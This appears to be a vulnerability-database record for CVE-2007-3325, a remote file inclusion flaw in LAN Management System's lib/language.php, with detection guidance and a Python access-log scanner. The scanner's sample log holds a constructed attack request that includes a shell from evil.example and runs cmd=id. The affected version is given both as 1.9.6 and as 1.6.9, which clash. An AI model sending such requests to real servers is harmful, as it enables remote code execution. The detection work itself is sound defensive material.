CVE-2007-3325
Published 2007-06-21
Priority: P3 (56) · Severity: high · CVSS 2.0 base score: 7.5
CVSS 2.0 vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
Exploit: public exploit available
EPSS: 64.36% (99.1st percentile)
PHP remote file inclusion vulnerability in lib/language.php in LAN Management System (LMS) 1.9.6 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the _LIB_DIR parameter, a different vector than CVE-2007-1643 and CVE-2007-2205.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| lms | lan_management_system | <= 1.6.9 | — |
Detection & IOCs (extracted from sources)
- Detect HTTP requests targeting lib/language.php whose _LIB_DIR parameter carries a URL; this indicates a remote file inclusion attempt.
- Look for GET requests to /lib/language.php containing _LIB_DIR= with an http:// or https:// value in the query string, since the exploit passes a remote shell URL directly in this parameter.
- The exploit appends a cmd= parameter alongside _LIB_DIR= to pass OS commands to the included remote shell; monitor for both parameters appearing together in requests to language.php.
- The vulnerable parameter _LIB_DIR must accept a full URL, so exploitation requires PHP's allow_url_include and allow_url_fopen to be enabled on the target; hardened configurations may not be exploitable.
- This is a different attack vector from CVE-2007-1643 and CVE-2007-2205; detection rules for those CVEs will not cover this specific lib/language.php/_LIB_DIR vector.
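The detection guidance above, turned into a log scanner as an added example (not code from the original record or from the LMS project): it walks Apache combined-format access log lines, keeps only requests to lib/language.php whose _LIB_DIR value begins with http:// or https://, and raises the severity when a cmd= parameter travels with it. The log lines and hostnames are constructed for the example.

```python
"""Detect CVE-2007-3325 exploitation attempts in web server access logs.

Added example (not from the original record): flags requests to
lib/language.php whose _LIB_DIR parameter carries a remote URL, and notes
when a cmd= parameter accompanies it, per the detection guidance above.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample lines in Apache combined log format (not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [21/Jun/2007:10:00:01 +0000] "GET /lms/lib/language.php?_LIB_DIR=http%3A%2F%2Fevil.example%2Fs.txt%3F&cmd=id HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [21/Jun/2007:10:00:02 +0000] "GET /lms/index.php?m=nodelist HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.9 - - [21/Jun/2007:10:00:03 +0000] "GET /lms/lib/language.php?_LIB_DIR=HTTPS://198.51.100.200/x HTTP/1.1" 200 128 "-" "curl/7.16"
192.0.2.4 - - [21/Jun/2007:10:00:04 +0000] "GET /lms/lib/language.php?_LIB_DIR=../lib HTTP/1.1" 200 128 "-" "Mozilla/5.0"
"""

# client, timestamp, method, request target (the rest of the line is ignored)
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*"')
# Remote scheme check is case-insensitive; PHP's URL wrappers are too.
REMOTE_SCHEME_RE = re.compile(r'^\s*https?://', re.IGNORECASE)


def inspect_line(line):
    """Return a finding dict for a suspicious request, or None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    client, ts, method, target = m.groups()
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/lib/language.php"):
        return None
    # parse_qs percent-decodes once, matching what PHP's $_GET sees.
    params = parse_qs(parts.query, keep_blank_values=True)
    remote = [v for v in params.get("_LIB_DIR", []) if REMOTE_SCHEME_RE.match(v)]
    if not remote:
        return None  # local path values are the application's normal use
    has_cmd = "cmd" in params
    return {
        "client": client,
        "timestamp": ts,
        "lib_dir": remote[0],
        "has_cmd": has_cmd,
        "severity": "critical" if has_cmd else "high",
    }


def scan_log(text):
    """Scan a whole log and return the list of findings, in log order."""
    return [f for f in (inspect_line(l) for l in text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```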
No detection rules found.
No writeups or analysis indexed.
References
- http://osvdb.org/36194
- http://www.securityfocus.com/bid/24578
- https://exchange.xforce.ibmcloud.com/vulnerabilities/34959
- https://www.exploit-db.com/exploits/4086